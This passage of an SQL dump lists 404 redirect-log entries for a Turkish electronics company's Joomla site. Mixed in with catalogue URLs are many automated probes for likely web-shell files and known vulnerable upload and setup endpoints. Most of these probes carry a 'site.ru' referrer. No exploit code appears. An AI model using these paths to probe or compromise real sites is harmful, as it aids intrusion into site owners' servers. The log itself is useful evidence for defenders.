00:00:00',301),(16228,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-14 20:49:43','0000-00-00 00:00:00',301),(16229,'http://3s-technologies.com.tr/tr/components/logo_img.php',NULL,'http://site.ru','',3,0,'2017-12-14 21:00:52','0000-00-00 00:00:00',301),(16230,'http://3s-technologies.com.tr/tr/optionsa/popup-pomo.php',NULL,'http://site.ru','',6,0,'2017-12-14 21:01:08','0000-00-00 00:00:00',301),(16231,'http://3s-technologies.com.tr/tr/conf.ini.php',NULL,'http://site.ru','',8,0,'2017-12-14 21:01:41','0000-00-00 00:00:00',301),(16232,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-10?language=en-gb',NULL,'','',11,0,'2017-12-14 21:06:41','0000-00-00 00:00:00',301),(16233,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/en/component/virtuemart/led-paneller/led-panel-sıvaustu/dirdesc?itemid=125',NULL,'','',3,0,'2017-12-14 21:10:08','0000-00-00 00:00:00',301),(16234,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name/dirdesc/results,1-20',NULL,'','',7,0,'2017-12-14 21:11:50','0000-00-00 00:00:00',301),(16235,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/fr/component/virtuemart/led-paneller/led-panel-sıvaustu?itemid=188',NULL,'','',2,0,'2017-12-14 21:34:45','0000-00-00 00:00:00',301),(16236,'http://3s-technologies.com.tr/tr/administrator/logo_img.php',NULL,'http://site.ru','',7,0,'2017-12-14 21:35:29','0000-00-00 00:00:00',301),(16237,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/thru-hole',NULL,'','',6,0,'2017-12-14 21:58:40','0000-00-00 00:00:00',301),(16238,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/by,`p`.product_sku',NULL,'','',1,0,'2017-12-14 22:04:08','0000-00-00 00:00:00',301),(16239,'http://3s-technologies.com.tr/tr/postnewa/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-12-14 22:20:30','0000-00-00 00:00:00',301),(16240,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/stencil-washer-eco-detail',NULL,'','',3,0,'2017-12-14 22:34:43','0000-00-00 00:00:00',301),(16241,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-14 22:42:13','0000-00-00 00:00:00',301),(16242,'http://3s-technologies.com.tr/tr/networka/popup-pomo.php',NULL,'http://site.ru','',9,0,'2017-12-14 22:45:07','0000-00-00 00:00:00',301),(16243,'http://3s-technologies.com.tr/tr/sec.php',NULL,'http://site.ru','',33,0,'2017-12-14 22:45:40','0000-00-00 00:00:00',301),(16244,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,product_sku?language=tr-tr',NULL,'','',25,0,'2017-12-14 23:19:06','0000-00-00 00:00:00',301),(16245,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name/results,1-50?language=en-gb',NULL,'','',8,0,'2017-12-14 23:42:13','0000-00-00 00:00:00',301),(16246,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,mf_name/results,1-20',NULL,'','',1,0,'2017-12-15 00:04:31','0000-00-00 00:00:00',301),(16247,'http://3s-technologies.com.tr/index.php/en/products/dalga-lehim/by?language=en-gb&product_sku',NULL,'','',1,0,'2017-12-15 00:22:56','0000-00-00 00:00:00',301),(16248,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name/dirdesc/results,1-50',NULL,'','',1,0,'2017-12-15 00:27:13','0000-00-00 00:00:00',301),(16249,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-15 00:34:43','0000-00-00 00:00:00',301),(16250,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-10?language=en-gb',NULL,'','',8,0,'2017-12-15 01:04:43','0000-00-00 00:00:00',301),(16251,'http://3s-technologies.com.tr/tr/maint/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-12-15 01:33:12','0000-00-00 00:00:00',301),(16252,'http://3s-technologies.com.tr/tr/logo_img.php',NULL,'http://site.ru','',8,0,'2017-12-15 01:44:39','0000-00-00 00:00:00',301),(16253,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-5?language=en-gb',NULL,'','',1,0,'2017-12-15 02:11:30','0000-00-00 00:00:00',301),(16254,'http://3s-technologies.com.tr/tr/libraries/legacy/log/js.php',NULL,'http://site.ru','',8,0,'2017-12-15 02:30:30','0000-00-00 00:00:00',301),(16255,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/fr/component/virtuemart/led-paneller/led-panel-sıvaustu?itemid=193',NULL,'','',1,0,'2017-12-15 02:46:30','0000-00-00 00:00:00',301),(16256,'http://3s-technologies.com.tr/tr/xmlrpc/header_img.php.suspected',NULL,'http://site.ru','',5,0,'2017-12-15 02:51:13','0000-00-00 00:00:00',301),(16257,'http://3s-technologies.com.tr/index.php/en//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2017-12-15 02:57:23','0000-00-00 00:00:00',301),(16258,'http://3s-technologies.com.tr/tr/components/com_search/models/mark.php',NULL,'http://site.ru','',7,0,'2017-12-15 03:01:01','0000-00-00 00:00:00',301),(16259,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,pc.ordering,product_name/results,1-10?language=en-gb',NULL,'','',3,0,'2017-12-15 03:05:50','0000-00-00 00:00:00',301),(16260,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/smd-düşük-hızlı/by,product_name?language=tr-tr',NULL,'','',1,0,'2017-12-15 03:11:58','0000-00-00 00:00:00',301),(16261,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,`p`.product_sku/results,1-20?language=en-gb',NULL,'','',1,0,'2017-12-15 03:12:38','0000-00-00 00:00:00',301),(16262,'http://3s-technologies.com.tr/tr/themesa/popup-pomo.php',NULL,'http://site.ru','',4,0,'2017-12-15 03:13:21','0000-00-00 00:00:00',301),(16263,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-ultra-hä±z',NULL,'','',8,0,'2017-12-15 03:37:38','0000-00-00 00:00:00',301),(16264,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-15 03:39:48','0000-00-00 00:00:00',301),(16265,'http://3s-technologies.com.tr/tr/good.php',NULL,'http://site.ru','',36,0,'2017-12-15 03:45:30','0000-00-00 00:00:00',301),(16266,'http://3s-technologies.com.tr/tr/libraries/phpmailer/language/mark.php',NULL,'http://site.ru','',1,0,'2017-12-15 03:46:02','0000-00-00 00:00:00',301),(16267,'http://www.3s-technologies.com.tr/en/products/dalga-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2017-12-15 04:05:54','0000-00-00 00:00:00',301),(16268,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_name/results,1-10',NULL,'','',1,0,'2017-12-15 04:13:45','0000-00-00 00:00:00',301),(16269,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/dirdesc/results,1-20?language=en-gb',NULL,'','',8,0,'2017-12-15 04:40:56','0000-00-00 00:00:00',301),(16270,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/mirae/smd-ultra-hız/by,ordering?language=tr-tr',NULL,'','',1,0,'2017-12-15 04:41:41','0000-00-00 00:00:00',301),(16271,'http://www.3s-technologies.com.tr/tr/urunler/konveyorler/by,mf_name/results,1-10',NULL,'','',8,0,'2017-12-15 04:47:43','0000-00-00 00:00:00',301),(16272,'http://3s-technologies.com.tr/tr/logs/system_infos.php',NULL,'http://site.ru','',2,0,'2017-12-15 04:54:26','0000-00-00 00:00:00',301),(16273,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name/results,1-50',NULL,'','',1,0,'2017-12-15 05:08:06','0000-00-00 00:00:00',301),(16274,'http://3s-technologies.com.tr/tr/tmp/logo_img.php',NULL,'http://site.ru','',4,0,'2017-12-15 05:15:36','0000-00-00 00:00:00',301),(16275,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,category_name/results,1-5',NULL,'','',1,0,'2017-12-15 05:21:41','0000-00-00 00:00:00',301),(16276,'http://3s-technologies.com.tr/tr/images/cache.php',NULL,'http://site.ru','',1,0,'2017-12-15 05:50:08','0000-00-00 00:00:00',301),(16277,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,product_name/dirdesc',NULL,'','',1,0,'2017-12-15 06:07:27','0000-00-00 00:00:00',301),(16278,'http://3s-technologies.com.tr/en/products/manufacturer/tolo/dalga-lehim/by,category_name/dirdesc/results,1-10?language=en-gb&filter_product=',NULL,'','',1,0,'2017-12-15 06:09:13','0000-00-00 00:00:00',301),(16279,'http://3s-technologies.com.tr/tr/plugins/header_img.php.suspected',NULL,'http://site.ru','',2,0,'2017-12-15 06:43:40','0000-00-00 00:00:00',301),(16280,'http://3s-technologies.com.tr/tr/libraries/logo_img.php',NULL,'http://site.ru','',3,0,'2017-12-15 07:05:26','0000-00-00 00:00:00',301),(16281,'http://3s-technologies.com.tr/tr/plugins/logo_img.php',NULL,'http://site.ru','',6,0,'2017-12-15 08:08:16','0000-00-00 00:00:00',301),(16282,'http://3s-technologies.com.tr/tr/phpmail/popup-pomo.php',NULL,'http://site.ru','',8,0,'2017-12-15 08:11:13','0000-00-00 00:00:00',301),(16283,'http://3s-technologies.com.tr/tr/xmlrpz.php',NULL,'http://site.ru','',7,0,'2017-12-15 08:31:14','0000-00-00 00:00:00',301),(16284,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/krem-lehim-31-32-33-detail',NULL,'','',24,0,'2017-12-15 09:05:53','0000-00-00 00:00:00',301),(16285,'http://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hä±z',NULL,'','',5,0,'2017-12-15 09:11:11','0000-00-00 00:00:00',301),(16286,'http://3s-technologies.com.tr/tr/modules/mod_footer/tmpl/mark.php',NULL,'http://site.ru','',10,0,'2017-12-15 09:33:25','0000-00-00 00:00:00',301),(16287,'http://3s-technologies.com.tr/tr/includes/rsq.php',NULL,'http://site.ru','',2,0,'2017-12-15 09:34:01','0000-00-00 00:00:00',301),(16288,'http://3s-technologies.com.tr/tr/widgetsa/popup-pomo.php',NULL,'http://site.ru','',1,0,'2017-12-15 09:44:04','0000-00-00 00:00:00',301),(16289,'http://3s-technologies.com.tr/tr//administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',1,0,'2017-12-15 09:58:48','0000-00-00 00:00:00',301),(16290,'http://3s-technologies.com.tr/tr/sessions/logo_img.php.suspected',NULL,'http://site.ru','',1,0,'2017-12-15 10:15:05','0000-00-00 00:00:00',301),(16291,'http://3s-technologies.com.tr/tr/stylesa/popup-pomo.php',NULL,'http://site.ru','',3,0,'2017-12-15 11:06:17','0000-00-00 00:00:00',301);
INSERT INTO `fz6t4_redirect_links` VALUES (16292,'http://3s-technologies.com.tr/tr/jdownloads/logo_img.php.suspected',NULL,'http://site.ru','',3,0,'2017-12-15 11:36:46','0000-00-00 00:00:00',301),(16293,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız/dirdesc',NULL,'','',2,0,'2017-12-15 12:08:06','0000-00-00 00:00:00',301),(16294,'http://3s-technologies.com.tr/tr/media/system_infos.php',NULL,'http://site.ru','',1,0,'2017-12-15 12:18:03','0000-00-00 00:00:00',301),(16295,'http://3s-technologies.com.tr/administrator/components/com_archive/plugin.php',NULL,'3s-technologies.com.tr','',1,0,'2017-12-15 12:23:29','0000-00-00 00:00:00',301),(16296,'http://3s-technologies.com.tr/tr/updatecore/popup-pomo.php',NULL,'http://site.ru','',9,0,'2017-12-15 12:39:19','0000-00-00 00:00:00',301),(16297,'http://3s-technologies.com.tr/tr/themes/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-15 12:41:18','0000-00-00 00:00:00',301),(16298,'http://3s-technologies.com.tr/tr/administrator/components/com_civicrm/civicrm/packages/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://www.google.com/','',24,0,'2017-12-15 12:43:04','0000-00-00 00:00:00',301),(16299,'http://3s-technologies.com.tr/tr/bin/logo_img.php.suspected',NULL,'http://site.ru','',4,0,'2017-12-15 13:42:03','0000-00-00 00:00:00',301),(16300,'http://3s-technologies.com.tr/tr/libraries/joomla/client/lauth.php',NULL,'http://site.ru','',2,0,'2017-12-15 14:14:24','0000-00-00 00:00:00',301),(16301,'http://3s-technologies.com.tr/tr/menusa/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-15 14:22:57','0000-00-00 00:00:00',301),(16302,'http://www.3s-technologies.com.tr/tr/blogs/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-15 15:35:45','0000-00-00 00:00:00',301),(16303,'http://www.3s-technologies.com.tr/tr/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-15 15:35:45','0000-00-00 00:00:00',301),(16304,'http://www.3s-technologies.com.tr/tr/blog/wordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-15 15:35:45','0000-00-00 00:00:00',301),(16305,'http://www.3s-technologies.com.tr/tr/wp-admin/setup-config.php',NULL,'','',2,0,'2017-12-15 15:35:46','0000-00-00 00:00:00',301),(16306,'http://www.3s-technologies.com.tr/tr/cms/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-15 15:35:46','0000-00-00 00:00:00',301),(16307,'http://www.3s-technologies.com.tr/tr/site/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-15 15:35:46','0000-00-00 00:00:00',301),(16308,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/flux/by,`p`.product_sku/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-15 17:47:09','0000-00-00 00:00:00',301),(16309,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/panasonic/smd-ultra-hız/by,product_name/dirdesc?language=en-gb',NULL,'','',1,0,'2017-12-15 21:15:10','0000-00-00 00:00:00',301),(16310,'http://3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/tr/component/virtuemart/led-paneller/led-panel-sıvaustu/dirdesc?itemid=119',NULL,'','',2,0,'2017-12-15 21:15:41','0000-00-00 00:00:00',301),(16311,'http://3s-technologies.com.tr/tr/profilea/popup-pomo.php',NULL,'http://site.ru','',1,0,'2017-12-15 21:30:57','0000-00-00 00:00:00',301),(16312,'http://3s-technologies.com.tr/tr/roots.php',NULL,'http://site.ru','',5,0,'2017-12-15 21:33:12','0000-00-00 00:00:00',301),(16313,'http://3s-technologies.com.tr/tr/toolsa/popup-pomo.php',NULL,'http://site.ru','',5,0,'2017-12-15 21:41:45','0000-00-00 00:00:00',301),(16314,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=155&itemid=81&lang=tr',NULL,'','',2,0,'2017-12-15 21:45:50','0000-00-00 00:00:00',301),(16315,'http://3s-technologies.com.tr/tr/parseopmla/popup-pomo.php',NULL,'http://site.ru','',5,0,'2017-12-15 22:43:15','0000-00-00 00:00:00',301),(16316,'http://3s-technologies.com.tr/tr/logs/ybbbcc.php',NULL,'http://site.ru','',3,0,'2017-12-15 23:03:29','0000-00-00 00:00:00',301),(16317,'http://3s-technologies.com.tr/tr/xmlrpc/system_infos.php',NULL,'http://site.ru','',5,0,'2017-12-15 23:44:08','0000-00-00 00:00:00',301),(16318,'http://3s-technologies.com.tr/tr/tmp/system_infos.php',NULL,'http://site.ru','',5,0,'2017-12-16 00:05:39','0000-00-00 00:00:00',301),(16319,'http://3s-technologies.com.tr/tr/f.php',NULL,'http://site.ru','',132,0,'2017-12-16 00:36:03','0000-00-00 00:00:00',301),(16320,'http://3s-technologies.com.tr/tr/images/pqcsfx3h.php',NULL,'http://site.ru','',3,0,'2017-12-16 00:36:52','0000-00-00 00:00:00',301),(16321,'https://www.3s-technologies.com.tr/en/products/screen-printer/spr-20-41-detail',NULL,'','',1,0,'2017-12-16 00:57:26','0000-00-00 00:00:00',301),(16322,'http://3s-technologies.com.tr/tr/wp-includes/upgrade/theme-compat/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-16 01:08:51','0000-00-00 00:00:00',301),(16323,'http://3s-technologies.com.tr/tr/language/logo_img.php',NULL,'http://site.ru','',3,0,'2017-12-16 02:06:32','0000-00-00 00:00:00',301),(16324,'http://www.3s-technologies.com.tr/en/products/smd-orta-hä±zlä±/dirdesc',NULL,'','',1,0,'2017-12-16 02:17:24','0000-00-00 00:00:00',301),(16325,'http://3s-technologies.com.tr/tr/phpmaila/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-16 03:06:46','0000-00-00 00:00:00',301),(16326,'https://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/rh2-20-detail',NULL,'','',1,0,'2017-12-16 03:15:26','0000-00-00 00:00:00',301),(16327,'https://www.3s-technologies.com.tr/en/products/rh2-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-12-16 03:38:08','0000-00-00 00:00:00',301),(16328,'http://www.3s-technologies.com.tr/tr/ã¼rã¼nler/konveyorler',NULL,'','',7,0,'2017-12-16 04:13:54','0000-00-00 00:00:00',301),(16329,'https://www.3s-technologies.com.tr/tr/urunler/screen-printer/spr-20-41-detail',NULL,'','',1,0,'2017-12-16 04:18:32','0000-00-00 00:00:00',301),(16330,'http://www.3s-technologies.com.tr/en/about-us/beta/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:23:32','0000-00-00 00:00:00',301),(16331,'http://www.3s-technologies.com.tr/en/about-us/blogs/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:23:32','0000-00-00 00:00:00',301),(16332,'http://www.3s-technologies.com.tr/en/about-us/blog/wordpress/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:23:33','0000-00-00 00:00:00',301),(16333,'http://www.3s-technologies.com.tr/en/about-us/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:23:33','0000-00-00 00:00:00',301),(16334,'http://www.3s-technologies.com.tr/en/about-us/site/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:23:33','0000-00-00 00:00:00',301),(16335,'http://www.3s-technologies.com.tr/en/about-us/cms/wp-admin/setup-config.php',NULL,'','',1,0,'2017-12-16 04:23:34','0000-00-00 00:00:00',301),(16336,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/krem-lehim/by,mf_name/dirdesc?language=en-gb',NULL,'','',23,0,'2017-12-16 04:45:11','0000-00-00 00:00:00',301),(16337,'http://www.3s-technologies.com.tr/en/wp-content/themes/bordeaux-theme/functions/upload-handler.php',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/bordeaux-theme/functions/upload-handler.php','',2,0,'2017-12-16 04:58:16','0000-00-00 00:00:00',301),(16338,'http://3s-technologies.com.tr/tr/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/folders.php',NULL,'http://site.ru','',4,0,'2017-12-16 05:10:38','0000-00-00 00:00:00',301),(16339,'http://3s-technologies.com.tr/tr/wp-models.php',NULL,'http://site.ru','',5,0,'2017-12-16 05:11:09','0000-00-00 00:00:00',301),(16340,'http://3s-technologies.com.tr/tr/discussiona/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-16 05:31:34','0000-00-00 00:00:00',301),(16341,'http://3s-technologies.com.tr/tr/administrator/head_img.php.suspected',NULL,'http://site.ru','',8,0,'2017-12-16 05:40:57','0000-00-00 00:00:00',301),(16342,'http://3s-technologies.com.tr/tr/language/system_infos.php',NULL,'http://site.ru','',3,0,'2017-12-16 06:13:41','0000-00-00 00:00:00',301),(16343,'http://www.3s-technologies.com.tr/joomla/index.php?option=com_content&view=article&id=147:sp18p-l-screen-printer&catid=57:screen-printer&itemid=146&lang=en',NULL,'','',1,0,'2017-12-16 06:18:24','0000-00-00 00:00:00',301),(16344,'http://3s-technologies.com.tr/tr/modules/mod_tags_popular/ntxxt.php',NULL,'http://site.ru','',3,0,'2017-12-16 06:21:28','0000-00-00 00:00:00',301),(16345,'http://3s-technologies.com.tr/tr/modules/mod_k2_0615/tmpl/default/bookmark.php',NULL,'http://site.ru','',3,0,'2017-12-16 06:41:51','0000-00-00 00:00:00',301),(16346,'http://3s-technologies.com.tr/tr/templates/ananda/gnb.php',NULL,'http://site.ru','',2,0,'2017-12-16 07:11:56','0000-00-00 00:00:00',301),(16347,'https://www.3s-technologies.com.tr/tr/urunler/smd-ultra-hız/mx200lp-3-detail',NULL,'','',1,0,'2017-12-16 07:51:16','0000-00-00 00:00:00',301),(16348,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/flux/by,product_sku?language=tr-tr',NULL,'','',7,0,'2017-12-16 08:01:37','0000-00-00 00:00:00',301),(16349,'http://3s-technologies.com.tr/tr/_private/logo_img.php.suspected',NULL,'http://site.ru','',3,0,'2017-12-16 08:14:47','0000-00-00 00:00:00',301),(16350,'https://www.3s-technologies.com.tr/tr/urunler/2-el-makineler/avf-detail',NULL,'','',1,0,'2017-12-16 08:37:18','0000-00-00 00:00:00',301),(16351,'http://3s-technologies.com.tr/tr/phpmyadmin/syijg.php',NULL,'http://site.ru','',2,0,'2017-12-16 08:42:43','0000-00-00 00:00:00',301),(16352,'http://3s-technologies.com.tr/tr/templates/beez3/gnb.php',NULL,'http://site.ru','',1,0,'2017-12-16 09:14:07','0000-00-00 00:00:00',301),(16353,'http://3s-technologies.com.tr/tr/installa/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-16 09:42:35','0000-00-00 00:00:00',301),(16354,'http://3s-technologies.com.tr/tr/libraries/joomla/template/popup-pomo.php',NULL,'http://site.ru','',6,0,'2017-12-16 09:44:06','0000-00-00 00:00:00',301),(16355,'https://www.3s-technologies.com.tr/index.php/en/products/spartan-8s-8d-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-16 09:47:05','0000-00-00 00:00:00',301),(16356,'http://3s-technologies.com.tr/tr/scriptsa/popup-pomo.php',NULL,'http://site.ru','',7,0,'2017-12-16 09:49:29','0000-00-00 00:00:00',301),(16357,'http://www.3s-technologies.com.tr/index.php/tr/component/content/category?format=feed&type=rss',NULL,'','',1,0,'2017-12-16 10:08:26','0000-00-00 00:00:00',301),(16358,'https://www.3s-technologies.com.tr/tr/dmb-elektronik.com/j2_3/index.php/fr/component/virtuemart/led-paneller/led-panel-sıvaustu?itemid=187',NULL,'','',1,0,'2017-12-16 10:09:41','0000-00-00 00:00:00',301),(16359,'http://3s-technologies.com.tr/tr/cache/logo_img.php.suspected',NULL,'http://site.ru','',5,0,'2017-12-16 10:13:40','0000-00-00 00:00:00',301),(16360,'https://www.3s-technologies.com.tr/en/products/smd-düşük-hızlı/ls60v-detail',NULL,'','',1,0,'2017-12-16 11:01:56','0000-00-00 00:00:00',301),(16361,'http://3s-technologies.com.tr/tr/components/com_ajax/ajax.lib.php',NULL,'http://site.ru','',7,0,'2017-12-16 11:11:53','0000-00-00 00:00:00',301),(16362,'http://3s-technologies.com.tr/tr/media/logo_img.php',NULL,'http://site.ru','',4,0,'2017-12-16 11:13:45','0000-00-00 00:00:00',301),(16363,'http://3s-technologies.com.tr/tr/js.php',NULL,'http://site.ru','',71,0,'2017-12-16 11:16:57','0000-00-00 00:00:00',301),(16364,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fırın/by,product_sku/results,1-20',NULL,'','',1,0,'2017-12-16 11:31:08','0000-00-00 00:00:00',301),(16365,'http://3s-technologies.com.tr/tr/lfm.php',NULL,'http://site.ru','',16,0,'2017-12-16 11:47:27','0000-00-00 00:00:00',301),(16366,'http://www.3s-technologies.com.tr/index.php/en/products/zero-ion-g3-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-16 12:07:44','0000-00-00 00:00:00',301),(16367,'http://3s-technologies.com.tr/tr/images/logo_img.php.suspected',NULL,'http://site.ru','',3,0,'2017-12-16 12:11:56','0000-00-00 00:00:00',301),(16368,'http://3s-technologies.com.tr/tr/cli/system_infos.php',NULL,'http://site.ru','',7,0,'2017-12-16 12:42:33','0000-00-00 00:00:00',301),(16369,'http://3s-technologies.com.tr/tr/layouts/joomla/tinymce/buttons/agzlngx.php',NULL,'http://site.ru','',2,0,'2017-12-16 12:44:01','0000-00-00 00:00:00',301),(16370,'http://3s-technologies.com.tr/tr/templates/header_img.php.suspected',NULL,'http://site.ru','',3,0,'2017-12-16 13:11:11','0000-00-00 00:00:00',301),(16371,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,product_name/dirdesc/results,1-50?language=en-gb',NULL,'','',1,0,'2017-12-16 13:54:09','0000-00-00 00:00:00',301),(16372,'http://3s-technologies.com.tr/index.php/tr/ueruenler/tel-lehim/dirdesc?language=tr-tr',NULL,'','',7,0,'2017-12-16 14:20:13','0000-00-00 00:00:00',301),(16373,'http://3s-technologies.com.tr/tr/revisiona/popup-pomo.php',NULL,'http://site.ru','',11,0,'2017-12-16 15:11:47','0000-00-00 00:00:00',301),(16374,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail',NULL,'','',22,0,'2017-12-16 15:35:06','0000-00-00 00:00:00',301),(16375,'http://3s-technologies.com.tr/tr/images/logo_img.php',NULL,'http://site.ru','',5,0,'2017-12-16 16:42:21','0000-00-00 00:00:00',301),(16376,'http://3s-technologies.com.tr/tr/images/logo_img.php',NULL,'http://site.ru','',1,0,'2017-12-16 16:42:21','0000-00-00 00:00:00',301),(16377,'http://3s-technologies.com.tr/en/products/2.-el-makineler/by,category_name/dirdesc/results,1-20',NULL,'','',3,0,'2017-12-16 18:49:51','0000-00-00 00:00:00',301),(16378,'http://3s-technologies.com.tr/tr/dark.php',NULL,'http://site.ru','',4,0,'2017-12-16 18:53:15','0000-00-00 00:00:00',301),(16379,'http://3s-technologies.com.tr/tr/logs/logo_img.php',NULL,'http://site.ru','',4,0,'2017-12-16 18:53:55','0000-00-00 00:00:00',301),(16380,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/rh2-20-detail',NULL,'','',11,0,'2017-12-16 19:48:51','0000-00-00 00:00:00',301),(16381,'http://3s-technologies.com.tr/index.php/en/products/tel-lehim/by,category_name?error=404&language=en-gb',NULL,'','',1,0,'2017-12-16 20:09:24','0000-00-00 00:00:00',301),(16382,'http://3s-technologies.com.tr/index.php/en/products/lfs-1-detail?print=1&tmpl=component',NULL,'','',1,0,'2017-12-16 20:09:58','0000-00-00 00:00:00',301),(16383,'http://3s-technologies.com.tr/en/wp-login.php',NULL,'','',273,0,'2017-12-16 21:44:28','0000-00-00 00:00:00',301),(16384,'http://3s-technologies.com.tr/index.php/en/products/flux/955lc-detail',NULL,'','',19,0,'2017-12-16 21:51:55','0000-00-00 00:00:00',301),(16385,'http://3s-technologies.com.tr/tr/pressthisa/popup-pomo.php',NULL,'http://site.ru','',2,0,'2017-12-16 22:59:51','0000-00-00 00:00:00',301),(16386,'http://www.3s-technologies.com.tr/en/products/smd-fä±rä±n/by,category_name',NULL,'','',1,0,'2017-12-16 23:16:07','0000-00-00 00:00:00',301),(16387,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/smd-fırın/by,product_name',NULL,'','',1,0,'2017-12-16 23:44:40','0000-00-00 00:00:00',301),(16388,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,product_sku/results,1-50',NULL,'','',1,0,'2017-12-16 23:44:43','0000-00-00 00:00:00',301),(16389,'http://3s-technologies.com.tr/en/products/screen-printer/spr-20-41-42-detail/askquestion?tmpl=component',NULL,'','',7,0,'2017-12-17 00:29:32','0000-00-00 00:00:00',301),(16390,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',1,0,'2017-12-17 00:45:30','0000-00-00 00:00:00',301),(16391,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',2,0,'2017-12-17 01:40:24','0000-00-00 00:00:00',301),(16392,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/ddm-novastar/screen-printer/by,category_name/dirdesc?language=tr-tr',NULL,'','',24,0,'2017-12-17 03:55:12','0000-00-00 00:00:00',301),(16393,'http://www.3s-technologies.com.tr/index.php/en/products/tel-lehim/245-sn63pb37-0.6mm-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-12-17 04:08:59','0000-00-00 00:00:00',301),(16394,'http://www.3s-technologies.com.tr/index.php/en/products/smd-ultra-hız/by,product_name?language=en-gb',NULL,'','',1,0,'2017-12-17 04:13:10','0000-00-00 